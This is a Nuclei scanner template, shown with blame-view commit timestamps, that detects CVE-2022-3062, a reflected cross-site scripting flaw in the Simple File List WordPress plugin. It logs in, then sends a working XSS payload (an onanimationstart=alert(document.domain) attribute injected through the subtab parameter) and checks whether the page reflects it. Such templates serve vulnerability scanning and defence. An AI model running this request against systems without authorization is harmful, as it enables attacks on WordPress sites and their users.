nuclei-templates/http/cves/2022/CVE-2022-3062.yaml

53 lines
2.1 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2022-3062
info:
name: Simple File List < 4.4.12 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 4.4.12
2023-04-21 08:56:01 +00:00
reference:
- https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a
- https://nvd.nist.gov/vuln/detail/CVE-2022-3062
- https://wordpress.org/plugins/simple-file-list/
- https://github.com/ARPSyndicate/cvemon
2023-04-21 08:56:01 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-07-11 19:49:27 +00:00
cve-id: CVE-2022-3062
2023-04-21 08:56:01 +00:00
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00106
epss-percentile: 0.43227
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
2023-04-21 08:56:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: simplefilelist
product: simple-file-list
2023-09-06 11:59:08 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist
2023-04-21 08:56:01 +00:00
http:
2023-04-21 08:56:01 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab="style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
2023-04-21 08:56:01 +00:00
- 'contains(body_2, "ee-simple-file-list")'
- 'contains(body_2, "onanimationstart=alert(document.domain)//")'
condition: and
# digest: 490a0046304402205105897f44d3816c47769c41fc4f3e93973ada3af56d974861f4e7935c3a85eb02203b4ec0b0e762749d37c743f15a512487d8019f7dc0a6b62066555b4449038171:922c64590222798bb761d5b6d8e72950